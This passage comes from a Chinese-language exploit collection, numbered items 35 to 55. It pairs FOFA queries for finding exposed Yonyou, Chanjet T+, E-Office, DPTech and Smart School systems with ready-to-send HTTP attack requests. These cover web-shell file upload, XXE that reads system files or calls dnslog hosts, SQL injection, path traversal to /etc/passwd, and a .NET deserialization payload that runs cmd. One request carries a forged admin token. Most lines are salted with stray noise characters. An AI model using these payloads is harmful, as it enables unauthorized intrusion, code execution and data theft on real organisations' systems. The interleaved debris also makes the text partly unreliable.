. L/ ^% q; v8 _; r3 [. S* PContent-Type: application/x-www-form-urlencoded3 l: y5 p( ^* K \8 {. v
Accept-Encoding: gzip, deflate
8 @, D: O' G* Q+ D3 DAccept: */*, v( ^' a' ~/ p/ m6 D4 Y8 `- w4 N
Connection: keep-alive
5 J, O B' e1 X( u9 E9 E: c
+ N7 B; V4 N( H1 y
* o- v7 v& J) i9 Z1 M35. 用友NC-Cloud importhttpscer任意文件上传
3 K& Y3 V# [" J# ^+ DFOFA:app="用友-NC-Cloud"( X. R9 Z* Z- c2 g$ Y
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
/ B0 ?, I# Q$ j' SHost: 203.25.218.166:8888) E8 ]1 U7 Q; O2 J5 P
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 O0 R# V# b& H" t
Accept-Encoding: gzip, deflate, F5 ?( N$ x; X- U& ]3 {+ u2 h4 x
Accept: */*
3 G: L1 n- E6 t& j, D, g' H1 \Connection: close" P3 a- @# p; [
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
9 m! W8 ?/ h; {( `. p& x# I" e- u. lContent-Length: 190
- S4 [4 G+ G. C% q1 i w( ZContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
! q m* _0 O8 b0 h& F) H
( r9 b2 t: K: ]1 `--fd28cb44e829ed1c197ec3bc71748df0
# I$ A; T$ [( R$ h& Q, I g; EContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
! z! \3 j$ D5 H9 w1 I3 D9 S) O! [9 l5 F2 H& _' U/ u9 H
<%out.println(1111*1111);%>0 z: S, e) [! y* Y
--fd28cb44e829ed1c197ec3bc71748df0-- `( t4 W& r) a
+ s R% c& ?2 n
- {& z- f* [% t3 t8 @0 W36. 用友NC-Cloud soapFormat XXE
, h- Y6 c& F: P$ xFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
L& }2 X! J/ s' o3 FPOST /uapws/soapFormat.ajax HTTP/1.1# g8 E, u. I! g! r: {3 z% |
Host: 192.168.40.130:8989
1 \ k# g/ `- i. h0 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
5 A0 c) f) o" I5 J$ l/ S4 lContent-Length: 263
" | j( }8 E. CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 c2 K0 ]4 H2 X
Accept-Encoding: gzip, deflate
4 R( H2 ~+ k) T2 `4 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) H! s9 c1 s# L) N2 W6 a- b; R- NConnection: close, |7 S/ S% ]; u3 l- |
Content-Type: application/x-www-form-urlencoded
% [% K+ _- }: j, U# yUpgrade-Insecure-Requests: 1
* V0 [; T1 [. U; t! ^: ~1 ?
8 {) t. l* r% F+ O0 Imsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
( E& }0 _) T7 T5 W/ d& W" W5 _+ S4 j3 ? a/ E! [
1 }& n4 K$ { t W37. 用友NC-Cloud IUpdateService XXE
) L* ?3 \9 v; ?' P, TFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ Q' i+ B5 {! J6 i' Y" k4 p
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1& f" v8 |; i% E. D" b
Host: 192.168.40.130:8989+ w2 @! ^( @$ D4 y i6 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.369 w; ]7 B! y) Y$ F3 a- w2 J% }
Content-Length: 421+ p9 k0 O. _) `6 Q6 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& \6 J% o: u* X' K$ aAccept-Encoding: gzip, deflate* L5 s& d3 S# F- P# u# @ u
Accept-Language: zh-CN,zh;q=0.9
4 {$ m& I% @1 G8 m6 HConnection: close
( V/ V! Y! K% V" @: A5 t2 GContent-Type: text/xml;charset=UTF-8
7 L; @% \4 Z8 l' t1 u& ASOAPAction: urn:getResult* y. @. \" ` D! N$ e. n; Q3 `
Upgrade-Insecure-Requests: 1
' W5 W L5 h; g- B7 ?/ w1 R6 l, w# @: \8 O
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">: r& z( W) z( G+ N, X% s
<soapenv:Header/>
* D" e. @2 J/ w3 l9 T<soapenv:Body>
5 m1 V5 Q! A5 B3 [! o: W<iup:getResult>1 g4 H, J8 H' p6 ~, Z4 I7 |
<!--type: string-->" U, f: t) |+ B* ^* d
<iup:string><![CDATA[
% m8 \! t0 L8 u. `+ t! I, E8 l4 G7 _<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>" |* o% ~- T5 q# N7 L
<xxx/>]]></iup:string>+ T( k* A( J) ]. J$ @
</iup:getResult>
9 N7 ]) l9 J; ]! [. A</soapenv:Body>' g, |+ r r6 ]% j# T H9 o
</soapenv:Envelope>( N$ V: c k% H6 ^2 @
/ [) I2 H9 {! w+ e" O
- A" \ i$ P0 b+ Z- V6 i3 B1 j' X3 _% U$ }
38. 用友U8 Cloud smartweb2.RPC.d XXE/ m; d2 X t* p# ^ I, b2 i
FOFA:app="用友-U8-Cloud". v6 F" f. }% P
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
1 z( |9 f! n6 L0 q" XHost: 192.168.40.131:8088" ~ k/ {* ~: I5 r' w0 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
# F( B) n0 c; f- v4 a2 J8 pContent-Length: 260
9 t: e V3 W: P7 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b36 }& Y; M' {8 s$ q5 J8 T' r
Accept-Encoding: gzip, deflate# y! y' H& b* q" ]6 n; K) l
Accept-Language: zh-CN,zh;q=0.95 q8 f. h3 _6 N8 O. s( _
Connection: close
' z! T# }' [/ j) o9 ZContent-Type: application/x-www-form-urlencoded0 b9 x: h+ f5 k7 k2 ]
* A& z$ u3 p0 [2 R1 k$ a2 A/ I__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
0 U; G* B* q3 L4 L% O+ z2 O$ u1 z+ A; k
6 f2 A# E! B4 S0 J- T+ I
39. 用友U8 Cloud RegisterServlet SQL注入
$ d( i/ g7 H9 D7 S; V n' q4 fFOFA:title="u8c"
+ E2 N/ j3 Y/ w' c' ^6 K8 TPOST /servlet/RegisterServlet HTTP/1.1
2 @8 t" G3 U/ w3 ^Host: 192.168.86.128:8089
( U. n c% |" ^" t3 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 P2 C( c8 T* L B; k0 O$ p
Connection: close
, l% l% _3 Z. W/ `- k9 p0 fContent-Length: 85' l! e$ O6 v: m. g& u8 ?
Accept: */*5 }6 n2 Y9 ~; i* Z
Accept-Language: en4 v4 `$ j, _ i% O8 O* v* Q8 u
Content-Type: application/x-www-form-urlencoded* u* p& X1 o1 l; w+ F4 n7 Q/ h, A h
X-Forwarded-For: 127.0.0.1' V5 f% s. N" _7 ~9 f6 l; n `
Accept-Encoding: gzip
9 `# z! U: Z5 G# A7 @1 l4 Z- A4 @ v8 q% O' H, f/ |+ O! c3 ~
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
/ S }2 k# s; s8 c( U4 j
/ J- \: W4 j, [% _, {1 d7 G" a" D8 Y+ N4 Z/ w4 z, a
40. 用友U8-Cloud XChangeServlet XXE# w4 f. H& S* Y6 @2 x3 {
FOFA:app="用友-U8-Cloud") t3 `) D* ~% A" f
POST /service/XChangeServlet HTTP/1.1
. E+ D# \2 m1 z _Host: x.x.x.x
' Q: t' d0 y1 [# jUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
a" e; q. c/ `Content-Type: text/xml* ~1 a/ Q/ }2 j, B
Connection: close
$ g. E$ g' ~8 t W
. E1 \; a9 C8 r u<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
1 I) N+ Q4 L& c0 `8 B$ k; A/ k5 N: Z! W) N% S2 f5 @9 s: ~
G( E% H$ }. P7 A, m
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 Z. C H2 ]4 ^2 \- \9 ~8 [
FOFA:app="用友-U8-Cloud"
/ Z$ G. q4 {) e& c, |3 kGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1$ h) o5 V5 l" r' K! }4 H+ Q5 ~; [/ C* c
Host:/ E" q; f; I0 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) M9 k% t! e! O
Content-Type: application/json
. [4 T" k" y3 _& ~2 O; r! Y( k, xAccept-Encoding: gzip
; h; s9 t3 k6 Z4 T! qConnection: close
& W5 X+ v, y3 t; W3 @! E5 w+ w0 y
4 A( h: S/ M8 }5 Z; \9 b W" S$ |$ c
42. 用友GRP-U8 SmartUpload01 文件上传& m; j/ N5 j5 n- L/ U
FOFA:app="用友-GRP-U8"
/ C. f( u$ I! a. s, i/ g+ j: CPOST /u8qx/SmartUpload01.jsp HTTP/1.1
& Q$ U6 D$ m7 D5 b+ g9 r3 o+ oHost: x.x.x.x: F7 m' f) E0 r a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt5 W: Q* k! i2 z( v. _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
- D' h. P5 f; b; d' u' [# F. m' I
PAYLOAD3 l# R. \& i1 f$ t% R
8 y* Z" N/ R- f5 D! c7 v# Y1 z6 L3 H4 B s: a+ s; p
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 I: W8 H& M1 ?6 r% R; b( t. U9 B
7 P. G5 G8 r9 T- U% B W3 c$ J' f43. 用友GRP-U8 userInfoWeb SQL注入致RCE; U4 s! U/ x/ X. p8 E6 K
FOFA:app="用友-GRP-U8"
$ d* r& L( D t) w* uPOST /services/userInfoWeb HTTP/1.1# z/ [, z1 r( r! E2 T
Host: your-ip
# y3 M! t! l2 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# [0 k5 c' b1 f: I; RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 f! A" X1 T# M3 e" a, f+ c3 A% ~1 zAccept-Encoding: gzip, deflate; U) } p# z) R
Accept-Language: zh-CN,zh;q=0.99 ~4 A$ O+ f: w4 P, U, g% u C+ A
Connection: close
. n" o) t- i- A/ i g7 WSOAPAction:
s2 o! L/ C1 GContent-Type: text/xml;charset=UTF-8
# B. G: M- y7 N, ^0 j: L
* d0 `+ R- p& l' M# u: }<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">( Y+ J7 T% O' `5 Y7 r$ P/ }+ G
<soapenv:Header/>
8 M8 l; J/ g1 |. g <soapenv:Body>
) U! q+ o1 `" ~! P <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">6 [$ S" M/ z7 R6 @
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>- o* U# Q1 J0 a/ M
</ser:getUserNameById>
3 l9 o1 Q L' }8 f: ^4 A( u y </soapenv:Body>
+ ~( \; X. d; Z: S8 n</soapenv:Envelope>
# E, l2 J# s6 L# V$ u" Q9 l, d- _2 n- g
; m" U$ t; T) E* K44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 v v2 @# b. b
FOFA:app="用友-GRP-U8"
& Z. ` ]# s# i' n2 J0 hGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.18 {' h# _- e" A
Host: your-ip
@, e* S5 ^5 \1 u. WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
% |% E/ W X: ]# T0 y4 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ |" t! u2 J1 k/ x& C
Accept-Encoding: gzip, deflate
- N ^1 y! F" U% h2 U+ |' ZAccept-Language: zh-CN,zh;q=0.9- _6 |2 I2 c- U! N. B! v( k2 O- p
Connection: close
" J9 |+ e( ?2 f( }
& v" N# R, k) q0 ~4 O5 e& A5 b. t" S k' Q5 N
45. 用友GRP-U8 ufgovbank XXE
/ m# ]' w" i( c( c$ r( z4 YFOFA:app="用友-GRP-U8"
. b+ q3 U ]' a; b9 L( APOST /ufgovbank HTTP/1.1
2 {/ X; j* N+ K. Z: ~' U5 d6 xHost: 192.168.40.130:2227 ^% Z& J( d& H2 P8 F* t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.00 b" W3 z u1 @0 Q/ Y( T: K
Connection: close: ~1 C5 u) V% Z. A
Content-Length: 161
7 H# U$ M5 ^2 [/ T6 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 {( j) \' l5 v, R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 @: q, r. N' b/ u5 O# B
Content-Type: application/x-www-form-urlencoded$ t. J2 @! Y+ U: O; o+ w2 V. W
Accept-Encoding: gzip
! m% v4 R4 ~5 |! K6 f! S( _$ \2 [* U5 y+ i
reqData=<?xml version="1.0"?>
( R# J& M9 J4 `+ u$ z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
w; z; |0 x. b% T d/ B/ D; M3 r5 W" Z, P! j e% g- x
! S7 Z0 s* y! B( T$ ]7 z. ?46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 X ?5 W- M8 `; S7 z) pFOFA:app="用友-GRP-U8"
( v; m0 {. Z& w1 c; d6 ]7 QGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
1 L3 [7 N* y2 r ]( ]2 D' hHost: your-ip
% F9 ^% ~% o) W2 Q! X9 X7 n6 X- |& ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.368 [- K1 R; Z& d# H5 `" _) a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 F2 ]2 N3 b4 G
Accept-Encoding: gzip, deflate: t3 k0 t$ j2 Y! o3 L
Accept-Language: zh-CN,zh;q=0.9
4 m( d/ t. ~/ L& v- W; r, U1 HConnection: close
: w! @ k7 W$ G3 i. B& b9 w
" M4 B) q$ K7 u2 R4 y; Z/ c1 P( L {
1 o! z, s$ V6 g9 w$ K6 ~3 R47. 用友GRP A++Cloud 政府财务云 任意文件读取! v# \% p# B7 t6 M* O
FOFA:body="/pf/portal/login/css/fonts/style.css"
2 T: \0 z( g7 c& W5 g3 \. a9 tGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.13 x4 p$ H s/ m t* C6 k
Host: x.x.x.x$ E7 h8 |& v+ y, T
Cache-Control: max-age=0$ t0 ]; X/ c& B
Upgrade-Insecure-Requests: 10 p- O! h T% D% _7 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ q) D+ K- |* z! @& C0 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' u# c( d! g4 H; R9 _! R6 M8 V* Y
Accept-Encoding: gzip, deflate, br
+ E) Y. r h0 u- D7 l- l! @: j# {0 WAccept-Language: zh-CN,zh;q=0.9
$ F6 ]+ e1 p- D6 I$ k" q: MIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
( k6 V9 u. f* N1 t; |Connection: close( Y% h3 ]- _$ b$ {
7 V6 b1 a! x. h& L# _
5 L5 F* _7 a1 h
( H9 K5 ^9 t& F48. 用友U8 CRM swfupload 任意文件上传: p% o2 Y1 B( ? g E1 H
FOFA:title="用友U8CRM"+ N9 c( J! A+ ^% @
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ E0 m) A% U+ w, j ?6 h
Host: your-ip& Y1 d) _1 n1 C0 p1 x7 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 T' D. {- j6 Y$ E- e( V3 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ g1 ~7 }' l8 w! i! z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ h, M. d$ f, ^Accept-Encoding: gzip, deflate1 i/ A! V+ ~4 `. ]# x/ [2 @; V
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
4 ?! Q* L% P% }' p: I------269520967239406871642430066855
/ `3 r6 { q- f/ C- q& V; k3 [Content-Disposition: form-data; name="file"; filename="s.php"1 J$ h% |; {. K B% |/ `2 T( }$ t$ r
1231
3 Z# c G! T8 w% S, e C! w. vContent-Type: application/octet-stream
; \9 J: Z8 N$ z( k------269520967239406871642430066855
( y' ?( t% j Q3 @& H5 l5 {Content-Disposition: form-data; name="upload"
7 c2 p7 {! j7 B6 xupload# o6 d+ ]( A3 A( s9 Z$ v
------269520967239406871642430066855--
, ?2 s- Z0 F7 n; J+ |4 R6 U: g" C6 {0 C* C8 ~) d8 _6 y3 j
6 {. p9 ]0 ~" X) h6 E2 P- @
49. 用友U8 CRM系统uploadfile.php接口任意文件上传: ^; `) _6 U; n& S/ J
FOFA:body="用友U8CRM"
% K8 ~% i9 c7 t" ]
8 s0 p' F5 J: |0 q1 ]2 X XPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& b- U N4 `) O, S, A1 @Host: x.x.x.x/ F- ^, ?: Z: p: Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 X1 m* l( L3 r& Z6 T' X; k0 B; \Content-Length: 329
3 d, S: q8 I7 }, [+ i) w7 Z# CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' N9 s' q2 I) A/ t5 T3 p0 j B
Accept-Encoding: gzip, deflate8 q4 g) f5 M# |( J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 a, m0 u# r4 v1 Q# LConnection: close
% @9 H9 n0 x4 I1 P3 tContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
2 z5 v' z& }3 l1 E; L! ]( L1 g2 m) J9 [* A+ k- F p, C
-----------------------------vvv3wdayqv3yppdxvn3w) R2 U3 W3 y* E
Content-Disposition: form-data; name="file"; filename="%s.php "
; ]! P, `+ _+ @5 P( o4 O @' pContent-Type: application/octet-stream
/ h- b" c# C9 [( G% |7 a" F2 k) ^3 N6 F7 }+ r0 z) d
wersqqmlumloqa/ ^- O: @5 r3 g8 I2 p; X
-----------------------------vvv3wdayqv3yppdxvn3w, B* g0 J& R( {6 a L# A
Content-Disposition: form-data; name="upload"4 m! H/ k8 k. x% F8 D
$ W' \/ F5 P: _6 N% d& Supload+ [, N# O/ r3 J% E, t. l
-----------------------------vvv3wdayqv3yppdxvn3w--
5 n. ~) B" H% l2 y% ^( Q& Q# |; G+ w! X1 |
( B2 q1 j( R* Y6 rhttp://x.x.x.x/tmpfile/updB3CB.tmp.php1 K0 h$ Z. O) J2 E
% f7 e# r! M- R50. QDocs Smart School 6.4.1 filterRecords SQL注入4 _' i. H( n9 @4 q6 ^0 W d9 ~. g
FOFA:body="close closebtnmodal"
' h1 r V) a' O1 FPOST /course/filterRecords/ HTTP/1.1
/ a3 x7 Q! ~% y3 \* w$ S" kHost: x.x.x.x; X, R+ r6 D0 q- h8 f% ~3 X0 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; \! D7 h/ k/ I9 U1 V
Connection: close
4 J; r7 v- P6 E8 W8 o8 _Content-Length: 224) p* o1 [: A* Q$ o* `" [2 D
Accept: */*
0 b) J3 r1 @0 ]; y# oAccept-Language: en
5 O3 o: b9 U# |7 G8 yContent-Type: application/x-www-form-urlencoded
( G$ v* Q( c# b, gAccept-Encoding: gzip
$ q/ ~4 c, h# ?. d' o; e% \# W: X7 I l
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=15 r" I# e( R" f. H. l8 g
% y+ h% V& P7 C. h& l
S+ J: u& M1 n; S" J7 }* J
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ X6 D. s# }+ g" @1 NFOFA:app="云时空社会化商业ERP系统"7 G- ~7 `. s7 k3 j5 i- }# K* ~
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! l: S3 X5 `- U* [8 x3 D( mHost: your-ip* \8 X M" q7 Q( O1 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36- u1 a w8 g/ H" a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: U5 j% ]0 q" K8 P: J" g! w
Accept-Encoding: gzip, deflate+ o& x. U9 X+ H$ Q% g. p3 K2 k
Accept-Language: zh-CN,zh;q=0.91 @, d; g. V' H9 |% n( l
Connection: close
" K7 F4 @2 c' r" {/ h4 F7 A" e
- c( \) E4 v* U. k% q. Z; `6 W; S8 ?/ M+ s+ Q; [* j
52. 泛微E-Office json_common.php sql注入
7 ~0 ~& B2 G+ {6 z7 Y+ ZFOFA:app="泛微-EOffice"
3 X7 R( k! t0 c$ p: ^) c5 A: L. f3 CPOST /building/json_common.php HTTP/1.1
" J9 L p& k/ ?' l' k7 h% `Host: 192.168.86.128:8097: h$ h; A! p. b* U1 s( \0 Z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) ~! V* D. C/ g$ G, W/ h% ] T U5 x) p
Connection: close$ e' ^* n3 r' Y( A4 W
Content-Length: 87
: K. a/ Y& q( hAccept: */*1 A( c) U- N2 ?1 Q+ X/ j: ~
Accept-Language: en
3 x5 t5 y# ?4 e! v4 G( {, @8 cContent-Type: application/x-www-form-urlencoded
6 G6 B. P4 X* z/ q1 r: jAccept-Encoding: gzip$ P7 _4 Z! s2 m# A) w& _2 U1 P3 ?2 d
$ a8 P/ y) m0 i0 z! S( X3 W+ Rtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
4 j$ w8 Q. c' S' ]/ q) e, R/ u9 ]; d
I: s& S) ~' i/ A53. 迪普 DPTech VPN Service 任意文件上传+ J$ G2 ~- O2 d) y1 Q+ F
FOFA:app="DPtech-SSLVPN"
, q$ Y! M( [% C8 q1 `% D/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; ^7 S: @ X% K4 e8 y
2 i5 x! @* Z7 K8 ~( v# F2 ?" s6 E4 W1 u) L. _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 i3 W* C9 e. k
FOFA:app="畅捷通-TPlus"
" ]" t7 _( u: w& G1 b! D# l3 E5 @第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件+ Y5 U }* b ]6 `0 E2 A
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt". P. C$ Y$ R8 g r& s' Z
; x2 q. f" Q" K, k/ ~1 l+ l* \
8 K! o. E& A; g/ o1 w5 n2 y% F
完整数据包9 @% U g# l! j" n, L
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.15 E2 p( h0 h+ E# p0 f: m' Y6 t
Host: x.x.x.x
) D/ g9 z5 {* i) _% O3 ?- ~; DUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F! j0 M( {+ W% P
Content-Length: 593$ f2 s: [6 m& Q( D* B
7 G0 a S+ K( [) p0 D{9 t; T6 X" b3 m$ R+ `3 A: L; @2 w
"storeID":{+ o2 b& c/ f4 }! K& m+ ~
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",, s2 G+ C. Q! F" S9 a# n _
"MethodName":"Start", ?+ C! J5 @7 e* C
"ObjectInstance":{
3 h& a' P: K; B5 s1 s. l "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," {/ |2 b( P. N' R; A, o+ z( a
"StartInfo":{
% A. t+ u/ s3 m "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ T. {9 |' Y/ c g- H2 W: O
"FileName":"cmd",
9 ^/ G, J2 S6 s) f# M$ G: ?4 w$ {# g "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
9 u- G0 W. l, U1 A }/ G! d5 y- w) |* n4 H
}
" D7 i0 U! b% z! _; {7 H }0 P: Z9 |2 s8 L3 a$ b
}+ E% m( R4 N" R7 @: v F4 U
( s7 h. \: |: S1 |
& ]+ I; o' F$ J; t6 x
第二步,访问如下url
2 H% q$ I" ^+ S3 Z) w/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt& C, p# ]: M8 ~ L1 B; Z7 q
" |6 i- F5 l$ ~, [( d" |
y8 c3 b$ U# r2 P( ^, O55. 畅捷通T+ getdecallusers信息泄露* |/ }, a, J7 r, o
FOFA:app="畅捷通-TPlus"0 S' C5 W7 o3 w0 c6 T8 p/ }
第一步,通过- W& K# x7 q1 `9 @, M5 Z- e' {: |- z- _
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie( o6 @- K) a* f1 X; R0 b# F* C
第二步,利用获取到的Cookie请求( S: t# c% Q; _5 {/ f% z
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
